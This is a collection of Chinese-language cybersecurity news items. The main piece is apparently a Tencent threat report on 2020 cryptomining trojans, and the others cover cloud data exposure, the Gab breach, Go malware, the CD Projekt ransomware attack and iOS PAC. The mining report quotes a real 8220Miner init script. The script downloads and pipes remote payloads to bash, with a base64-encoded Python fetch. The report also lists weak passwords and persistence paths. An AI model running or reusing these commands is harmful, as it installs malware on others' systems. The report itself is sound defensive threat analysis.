应用开发者往往依赖第三方服务器来简化数据存储，但最新研究表明很多时候这些服务器对敏感数据并未提供完善的安全保护。来自亚马逊、谷歌和微软的第三方服务提供存储用户数据和系统文件的简单方式，开发者就不需要自己费力地对服务器进行编码。但开发者往往没有对这些服务器提供妥善的安全的保护，让用户数据处于开放状态，从而给黑客有乘之机。 根据市场调查机构 Zimperium 发布的最新研究表明，不管供应商是谁这种情况都时有发生。他们调查统计之后发现，14% 使用云存储的 iOS 和 Android 应用程序都有不安全的配置，非常容易受到攻击。 研究指出，这些服务器中可用的数据类型取决于相关应用，但所有存储的数据都可能被黑客使用。这些不安全的数据涵盖了从姓名和地址到每个用户的医疗和财务数据。 Zimperium表示，漏洞和数据被暴露后，可以用来获取更多敏感数据和操作流程。一些应用程序泄露了整个云基础设施脚本，包括SSH密钥和支付 kiosks 的密码。 Zimperium 对使用公共云服务的 8.4 万个 Android 应用和 4.7 万个 iOS 应用进行了调查之后得出以上结果的。在这些使用服务的应用中，有14%的应用暴露了用户数据。 Zimperium 的首席执行官 Shridhar Mittal 表示：“这是一个令人不安的趋势。很多这些应用的云存储都没有被开发者或负责人正确配置，正因为如此，数据对几乎任何人都是可见的。而我们大多数人现在都有一些这样的应用”。问题在于开发者没有保护好自己的服务器，所以任何和所有的应用类别都会受到影响。研究发现受影响最大的类别包括商业、购物、社交、通信和工具。       （消息及封面来源：cnBeta）

在 Palar 被关闭之后，大量用户涌向了一个类似的平台–Gab，不过该平台近日遭到了黑客攻击。超过 1.5 万名 Gab 用户的公共和个人信息被窃取。援引 Wired 报道，该黑客利用 SQL 注入漏洞从后台数据库中窃取了大约 70GB 的平台用户数据，包含该网站的 4000 多万条帖子。 这些数据包括 1.5 万名 Gab 用户的公共、私人互动，并详细说明了用户的个人资料、哈希密码和组别的纯文本密码。而在泄漏的用户中，包括前美国总统特朗普、MyPillow 首席执行官迈克-林德尔，国会女议员马乔里-泰勒-格林和 Infowars 主持人亚历克斯-琼斯等知名人士的账户。不过，该公司否认自己遭遇了数据泄露，并向 Gab 用户保证，他们的密码没有被泄露。 反保密活动组织 DDoSecrets 已经将这些数据汇编成了一个名为 GabLeaks 的东西，打算将其提供给选定的记者、社会科学家和研究人员进行进一步分析。这引起了 Gab 首席执行官安德鲁-托巴的回应，他将这些黑客活动家描述为 “精神病 “恶魔。       （消息及封面来源：cnBeta）

根据网络安全公司 Intezer 本周发布的一份报告，自 2017 年以来使用 Go 编程语言编写的恶意软件数量呈现爆发式增长，增幅超过 2000%。从报告中可以看到，恶意软件作者已逐渐从 C/C++ 转向 Go，这是一种由谷歌在 2007 年开发并推出的编程语言。 虽然首个基于 Go 语言开发的恶意软件在 2012 才被检测到，但在短短几年时间里该语言已经在恶意软件领域快速流行起来。Intezer 在报告中说：“在 2019 年之前，发现用 Go 编写的恶意软件更多的是一种罕见的现象，而在 2019 年期间，它变成了一种日常现象”。 如今，Golang（Go 的另一种称呼）已经取得了突破性进展，并被广泛采用。有国家背景的黑客组织（比较出名的有 APT）、网络犯罪运营商，甚至安全团队都在使用它，他们经常用它来创建渗透测试工具包。 Golang 之所以会出现这种突然暴涨的现象，主要有三个原因。首先是 Go 支持跨平台编译的简易流程。这使得恶意软件开发者只需编写一次代码，就可以从同一个代码库中编译出多个平台的二进制文件，使他们可以从同一个代码库中针对 Windows、Mac和Linux，这种多功能性是其他许多编程语言通常不具备的。 第二个原因是，基于 Go 的安装文件仍然很难被安全研究人员分析和逆向工程，这使得基于Go的恶意软件的检出率一直很低。第三个原因与 Go 对网络数据包和请求工作的支持有关。 Intezer解释说：“Go有一个非常好写的网络堆栈，很容易使用。Go已经成为云的编程语言之一，很多云原生应用都是用它编写的。例如，Docker、Kubernetes、InfluxDB、Traefik、Terraform、CockroachDB、Prometheus和Consul都是用Go编写的。这很有意义，因为创建Go背后的原因之一是发明一种更好的语言，可以用来取代谷歌内部使用的C++网络服务”。         （消息及封面来源：cnBeta）

一、摘要 2020年各类数字加密货币价格迎来暴涨，比特币价格一度超过5万美元/BTC，市值达到9200亿美元，是2019年底的10倍之多，达到了历史最高点。同期挖矿木马最偏好的门罗币价格也同步增长6倍，这意味着黑客通过进行门罗币挖矿，兑现后收益可达到以往收益的6倍。 在如此大利益诱惑之下，黑产团伙已闻风而动，纷纷加入了对主机计算资源的争夺。一个典型现象就是，有大量挖矿木马在运行时，会尝试清除竞争对手木马。 门罗币价格曲线（数据来源：coinmarketcap.com） 根据腾讯安全威胁情报中心的检测数据，2020年挖矿木马上升趋势十分明显。 2020年挖矿木马增长趋势 本报告以腾讯安全产品获取的安全事件告警工单数据为基础，统计分析得出2020年挖矿木马的活跃家族TOP榜，从挖矿木马主要入侵特点、漏洞利用偏好、持久化运行手段等方面展示其主要威胁，预测未来挖矿木马攻击可能呈现的新趋势，给政企机构安全运维团队提供常见挖矿木马的防御清理建议。 二、挖矿木马风险 1.1 挖矿家族TOP榜 2020年度挖矿木马家族排名前三的分别为DTLMiner（永恒之蓝下载器木马）、H2Miner、GuardMiner，榜单中有通过永恒之蓝漏洞传播的为DTLMiner、NSABuffMiner、NSAGluptebaMiner，有利用Redis、Hadoop、Weblogic、Drupal、thinkphp等应用程序漏洞传播的为H2Miner、GuardMiner、z0Miner、8220Miner等家族，以及主要通过弱口令爆破进行传播的为KoiMiner家族。 1.2 挖矿木马的危害 挖矿木马最容易被感知到的影响就是服务器性能会出现严重下降，从而影响服务器业务系统的正常运行，严重时可能出现业务系统中断或系统崩溃。如下图所示案例，H2Miner挖矿木马运行时占用了98%的CPU资源，系统性能已严重受损。 其次，挖矿木马威胁事件往往伴随着攻击者组建僵尸网络。感染挖矿木马的同时，服务器已成为黑客控制的肉鸡电脑，除了硬件资源被浪费，黑客还可能利用失陷主机对其他目标进行攻击，包括蠕虫式的横向攻击扩散、对特定目标进行DDoS攻击、作为黑客下一步攻击的跳板隐藏攻击者线索或攻击真实意图、将失陷主机作为分发木马的下载服务器或C2服务器等等。 第三，失陷主机可能造成信息泄露。攻击者入侵成功，很多情况下已获得服务器的完全权限，只要攻击者愿意，就可能盗取服务器数据，使受害企业面临信息泄露风险，攻击者也可能在服务器下载运行勒索病毒，随时可能给企业造成更加严重的破坏。 第四，攻击者入侵安装挖矿木马的同时，还可能在服务器安装后门、服务和计划任务，实现对失陷主机的稳固长期控制。腾讯安全专家分析发现，较多挖矿木马威胁事件发生后，攻击者会添加管理员用户、安装远程控制软件，以及为方便攻击者下次连接开放特定的网络端口。 鉴于以上这些危害，我们建议政企机构安全运维人员高度警惕挖矿木马感染事件，挖矿可能仅仅是攻击者制造危害的第一步，极可能处于黑客入侵后危害最轻的阶段。 2.挖矿木马入侵通道 2.1 利用漏洞攻击 远程代码执行漏洞（RCE）可以让远程攻击者直接向后台服务器远程注入操作系统命令或者恶意代码，从而控制后台系统，挖矿木马攻击时最常用的远程代码执行漏洞TOP统计如下： 在2020年挖矿木马最常利用的RCE漏洞排行榜里，WebLogic CVE-2019-2725高居榜首。 此外，还有各种未授权访问漏洞被攻击者利用。即需要安全配置或权限认证的地址、授权页面存在缺陷导致攻击者可以直接访问，从而引发敏感信息泄露或恶意代码执行。挖矿木马攻击时常用未授权访问漏洞列表如下： 未授权访问应用类型 开放默认端口 Redis 6379 Hadoop Yarn RESET API 8088 Docker Remote API 2375 Kubernetes 10255/10250 Jenkins 8080 XXL-JOB 9999 宝塔面板phpMyAdmin 888 Apache Flink Dashboard 8081 PostgreSQL 5342 典型案例 案例1：Z0Miner利用公开仅15天的高危漏洞攻击挖矿 腾讯安全团队于2020年11月2日发现挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞（CVE-2020-14882/14883）进行攻击，本次攻击距离Weblogic官方发布安全公告（2020.10.21）之后仅仅15天。 挖矿木马团伙对于新漏洞武器的采用速度之快，由此可见一斑。这一案例促使安全研究人员需要更快速的响应高危安全漏洞，当面临数量庞大的云主机高危漏洞需要修补时，对安全运维人员构成极大挑战。 案例2：redis服务器配置弱口令致SuperManMiner控制约万台主机挖矿 腾讯安全威胁情报中心检测到利用Redis未授权访问漏洞直接写入计划任务，下载用golang语言编写的挖矿木马下载器superman，根据挖矿算力推测该团伙已控制约1万台失陷系统进行门罗币挖矿。 在本例中，部分政企机构使用Redis时，由于没有对redis进行良好的配置，如使用空口令或者弱口令等，导致攻击者可以直接访问redis服务器，并可以通过该问题直接写入计划任务甚至可以直接拿到服务器权限。 案例3：RunMiner控制约1.6万台主机挖矿 腾讯主机安全（云镜）捕获RunMiner挖矿木马利用Apache Shiro反序列化漏洞（CVE-2016-4437）攻击云服务器。RunMiner挖矿团伙入侵成功后会执行命令反弹shell连接到C2服务器对肉鸡系统进行远程控制，然后继续下载执行Run.sh，下载XMRig挖矿木马tcpp进行门罗币挖矿，病毒通过安装定时任务进行持久化。 根据RunMiner挖矿木马使用的门罗币钱包算力(约268.6KH/s)推算，该挖矿团伙已控制约16000台服务器执行挖矿任务。在黑客控制的服务器上还发现多个扫描探测、网络入侵和远程控制工具，该团伙显然是专业黑灰产经营团伙之一。 2.2 爆破攻击 用户在设置系统登陆密码时，为了方便记忆往往采用默认的空口令或者非常简单的密码例如admin、root、test、111111、123456等，使用这些密码导致黑客可以轻易猜解并登陆，从而入侵系统，部分常见的弱密码如下： admin admin12 admin888 admin8 admin123 sysadmin adminxxx adminx root roots test test1 test123 test2 password aaaAAA111 888888 88888888 000000 00000000 111111 11111111 aaaaaa aaaaaaaa 135246 135246789 123456 许多挖矿木马在传播时也会针对系统的弱密码进行爆破攻击，根据腾讯安全2020年云上安全报告提供的数据，默认用户名、端口名被爆破攻击的次数达数十亿次之多。常被挖矿木马爆破攻击的服务类型包括SSH、Mssql、Redis等，各类型爆破攻击对应的挖矿家族如下： MS SQL 永恒之蓝下载器木马、GuardMiner 、MrbMiner、BasedMiner、贪吃蛇挖矿木马、快GO旷工 SSH爆破 永恒之蓝下载器木马、Ks3_Miner、LoggerMiner、8220Miner、DDG Redis爆破 永恒之蓝下载器木马、H2Miner、GuardMiner、DDG Msql爆破 Mykings 2.3 僵尸网络渠道 利用僵尸网络渠道分发成为挖矿木马越来越偏好的传播手段之一，挖矿木马自身也在组建僵尸网络。僵尸网络在分发安装挖矿木马的同时，还会下载持久化模块、远程控制模块、攻击传播模块、自动更新模块等多种恶意组件，以达到对已感染机器进行长久利用和控制的目的，已失陷的肉鸡系统又会成为新的攻击源，如此不断扩大僵尸网络的规模。 具有僵尸网络特征的挖矿木马TOP榜如下，其中前三位是DTLMiner（永恒之蓝下载器木马）、H2Miner、GuardMiner为老牌僵尸网络，由于控制该僵尸网络的幕后黑客团伙仍在不断更新其攻击方法，使其在出现后的数年里仍然保持很高的活跃度。 在2020年新活跃的挖矿木马家族以Linux服务器为攻击对象的居多，例如通过SSH弱口令攻击的Outlaw、Prometei，通过Docker Remote API漏洞入侵的TeamTNT，以及通过Nexus Repository Manager 3弱密码入侵，利用Mysql、Tomcat弱口令爆破，Weblogic远程代码执行漏洞进行横向扩散的Sysrv-hello家族等等。 典型案例 案例4：TeamTNT TeamTNT挖矿团伙通过批量扫描公网上开放2375端口的云服务器，并尝试利用Docker Remote API未授权访问漏洞对云服务器进行攻击。 TeamTNT在成功入侵云服务器后，会隐藏进程，通过安装定时任务持久化，并收集主机上的隐私数据（如主机用户名和密码、RSA登录凭证、AWS CLI跨账户授权信息、docker配置信息）上传到C2服务器。与此同时，为了控制更多肉鸡系统，增加挖矿收益，TeamTNT团伙还利用SSH复用连接进行横向移动以感染更多服务器。 案例5：Sysrv-hello 腾讯安全威胁情报中心检测到Sysrv-hello僵尸网络对云上Nexus Repository Manager 3存在默认帐号密码的服务器进行攻击。得手后再下载门罗币矿机程序挖矿，同时下载mysql、Tomcat弱口令爆破工具，Weblogic远程代码执行漏洞（CVE-2020-14882）攻击工具进行横向扩散。其攻击目标同时覆盖Linux和Windows操作系统。 案例6：Outlaw 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒（Outlaw）僵尸网络攻击。亡命徒（Outlaw）僵尸网络最早于2018年被发现，其主要特征为通过SSH爆破攻击目标系统，同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示，亡命徒（Outlaw）僵尸网络已造成国内约2万台Linux服务器感染，影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz，可能为亡命徒（Outlaw）僵尸网络的第3个版本，母体文件释放shell脚本启动对应二进制程序，kswapd0负责进行门罗币挖矿，tsm32、tsm64负责继续SSH爆破攻击传播病毒。 3.挖矿木马持久化 入侵者攻击得逞之后，会通过各种技术手段安装后门、服务和定时任务，添加管理员帐户、开放网络端口，实现对失陷主机的持久控制。 3.1 Linux定时任务 WatchbogMiner通过多种方式创建定时任务，在指定的时间执行恶意代码： 1）通过写入文件创建 写入文件如下： /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 2）通过crontab命令创建 3）通过at命令创建 4）通过修改环境变量”/home/$me/.bashrc”、”/root/.bashrc”创建 3.2    Linux系统服务 1）WannaMine将恶意代码写入启动目录/etc/rc.d/init.d目录下，随系统启动执行。 2）8220Miner通过写入系统初始化脚本/etc/init.d/down，将恶意代码添加到启动项。 echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL hxxp://5.196.247.12/xms||wget -q -O- hxxp://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download hxxp://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3）Muhstik僵尸网络通过写入/etc/inittab，添加恶意程序到系统启动项。 4）4SHMiner通过安装服务/etc/init.d/c3pool_miner启动挖矿脚本。 5）4SHMiner4SHMiner通过安装服务/etc/systemd/system/moneroocean_miner.service启动挖矿脚本。 3.3    Windows WMI KingMiner使用WMI创建名为WindowsSystemUpdate_WMITimer的计时器，并将事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate _filter绑定到计时器，从而通过计时器每15分钟执行一次恶意脚本代码。 三、未来趋势 挖矿木马针对云上攻击增长较快，企业安全管理人员时刻面临新的挑战。黑灰产业对谋求非法利益的追求没有止境。受利益趋势，挖矿团伙对新漏洞武器的采用速度越来越快，这对防御方的安全响应能力提出了更高的要求。与此同时，众多网络组件的安全漏洞仍会源源不断涌现。 旧的挖矿僵尸网络依然活跃，新僵尸网络不断出现，模块化的、持续扩张、挖矿团伙跟僵尸网络相互勾结的情况日趋多见。这种复杂的安全态势使得政企机构难以采用单一技术方案防御和清除威胁。 四、安全建议 腾讯安全团队在20多年的安全实践中，逐步改进保护自身业务所采用的多层级安全解决方案，将安全威胁情报、主机云防火墙、云主机安全等一系列安全产品统一由安全运营中心（SOC）管控，构建多层次的纵深防御体系，全面阻断挖矿木马的攻击威胁。 腾讯安全全系列产品支持在挖矿木马、僵尸网络入侵攻击的各个环节进行检测、防御： 4.1 防御建议 1）建议政企机构运维人员对Linux服务器的SSH服务、Windows SQL Server等常用主机访问入口设置高强度的登录密码，以对抗弱口令爆破攻击。 推荐政企机构在终端部署腾讯云主机安全（云镜）产品，腾讯主机安全产品具有密码爆破拦截、异地登录提醒、木马文件查杀、高危漏洞检测等安全功能，可对云主机的Linux系统、Mysql、Tomcat等账号的弱口令进行检测。 2）对于Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres等应用增加授权验证，对访问对象进行控制。 3）如果服务器部署了Weblogic、Apache Struts、Apache Flink、ThinkPHP等经常曝出高危漏洞的服务器组件，应及时将其更新到最新版本，并且实时关注组件官方网站和各大安全厂商发出的安全公告，根据提示修复相关漏洞。 推荐政企机构在网络边界部署腾讯云防火墙产品，腾讯云防火墙基于网络流量进行威胁检测与主动拦截，腾讯安全团队会及时响应最流行的高危漏洞利用，快速发布检测规则，使用虚拟补丁技术有效阻断挖矿木马入侵时利用的各类高危漏洞。 4.2 清理建议 政企机构运维人员可以使用腾讯主机安全产品检测清除入侵服务器的各种木马，根据主机安全木马查杀告警信息的指引彻底清除病毒木马。 在日常运维中，系统管理员可注意以下内容： 1）检查有无占用CPU资源接近甚至超过100%的进程，如有找到进程对应文件，确认是否属于挖矿木马，Kill 挖矿木马进程并删除文件；kill 掉包含下载恶意shell脚本代码执行的进程； 2）检查/var/spool/cron/root、/var/spool/cron/crontabs/root等文件中有无恶意脚本下载命令，有无挖矿木马启动命令，并将其删除； 3）如有发现挖矿相关进程、恶意程序，及时对服务器存在的系统漏洞、弱口令、Web应用漏洞进行排查和修复。

2月25日CDPR官方在微博上宣布，《赛博朋克2077》1.2版更新内容将推迟发布。因为CDPR近期遭受网络攻击，并且1.2版本内容较多需更多时间打磨。预计新的发布时间为三月份的下半月。 尽管我们真切地想要在曾说明的时间内推出《赛博朋克 2077》的1.2 版本更新，但是由于工作室 IT 架构近期遭受网络攻击以及出于1.2 版本本身体量的考虑，我们需要更多时间。 我们为 1.2 版本设定的目标超出了之前的所有更新，它将为游戏各方面带来诸多改善和修复。为了确保这一点，我们还有更多工作要做。因此，我们预计新的发布时间为三月下半。 这并非我们希望分享给大家的消息，但我们需要更为妥善地发布此次版本更新。更多讯息将于届时带来。感谢您一如既往的耐心和支持。 目前《赛博朋克2077》最新的大型更新是1.1版本，主要对多方面的稳定性作出了改善。 据报道，2月24日，《赛博朋克2077》的开发商波兰“CD Projeckt”公司宣布，公司之前遭遇的黑客袭击干扰了游戏补丁包的开发工作，因此该游戏的补丁将会推迟到三月的“后半部分”发行。 这次黑客攻击发生在二月初，黑客攻破了CD Projeckt公司的内部信息系统，其中包括《赛博朋克2077》游戏的源代码。这对于该公司来说是屋漏偏逢连夜雨。之前，《赛博朋克2077》发布之后被爆出问题多多。 该公司在推特官方账号上表示，公司很希望在之前公布的时间段内推出《赛博朋友》1.2版补丁，然而公司IT基础设施遭遇的网络攻击，再加上游戏升级的工作量庞大，这意味着公司将无法按照原定时间发布补丁包，相关开发需要更多时间。 一月份，该公司已经针对《赛博朋克2077》游戏推出了一个补丁包，并且计划在二月份推出一个更大的补丁包。 “CD Projeckt”公司以“巫师”系列中世纪奇幻角色扮演游戏而闻名，这些游戏的成功也导致该公司股价大幅上涨，然而《赛博朋克2077》游戏发布之后出现的问题，导致股价在去年底下跌。 据报道，这一次黑客袭击属于“勒索式攻击”，黑客要求被攻击者支付赎金，除了《赛博朋友2077》游戏源代码之外，黑客还获取了公司员工个人隐私信息以及其他敏感数据。一些信息稍后曾经在网络上销售。 消息人士透露，面对这次勒索攻击，CD Projeckt公司拒绝支付赎金，这导致员工时至今日无法登录公司虚拟专用网，无法获取完成游戏开发的工具。 对于员工来说，这次攻击也是一次“噩梦”。黑客获取了大量员工个人信息，包括波兰身份号码、个人护照信息。公司要求员工紧急冻结个人银行账号，并且向政府机构以及相关银行报告了攻击事件。 另外，该公司还要求员工把个人电脑带到IT部门，检查是否被植入恶意软件或是其他入侵工具。 之前，由于游戏爆出质量问题，索尼公司采取了极端措施，将《赛博朋克2077》游戏从“PlayStation游戏商店”紧急撤架。而1.2版补丁被认为是解决问题的最重大补丁包，该公司表示：“我们对于1.2版补丁的开发目标超过了之前所有的补丁。”       （消息及封面来源：新浪科技）

几位恶意软件研究人员宣称，iOS 14.5 中即将引入的一项改动，将使得在 iPhone 上执行“零点击”（Zero Click）漏洞利用变得更加困难。据悉，苹果悄然改变了在 iOS 14.5 Beta 测试版本上的代码运行方式，更多细节有望在下一次公开推送时披露。 具体说来是，该公司添加了指针验证码（PAC），以保护用户免受通过内存破坏来注入恶意代码的攻击。 在调用之前，系统将会验证所谓的 ISA 指针，后者是一种告知 iOS 程序要运行什么代码的安全特性。 一位研究人员指出，其在 2 月初的反向工程工作期间，发现了 iOS 14.5 Beta 测试版本中引入的这项新变化。 与此同时，苹果还在 2 月 28 日公开发布的新版《平台安全性指南》中分享了有关 PAC 的一些细节。 研究人员向 Motherboard 表示，这项安全性缓解措施，将使得零点击漏洞的利用过程变得更加难以实现。 这类攻击特指攻击者无需用户进行任何干预，即可对 iPhone 发起入侵，甚至通过复杂的技术手段，从 iOS 内置隔离的沙盒安全机制中逃逸。 苹果发言人亦在接受外媒采访时称，该公司相信这项改变将使得零点击漏洞攻击变得更加难以实现，但也补充道，设备安全性并不取决于单一的缓解策略，而是需要借助一系列的组合拳。 安全研究人员表示，尽管不能完全排除，但新措施可以提升相关标准，让此类攻击的利用成本大幅提升。 在此之前，零点击漏洞已被用于针对 iPhone 用户的几次引人注目的攻击。比如 2016 年的时候，阿联酋方面就利用名为 Karma 的黑客工具，侵入了数百部的 iPhone 。 此外 2020 年的一份报告表明，零点击漏洞被用于监视 37 名记者的 iPhone，且谷歌 Project Zero 安全团队还发现了其它潜在的零点击攻击漏洞。       （消息及封面来源：cnBeta）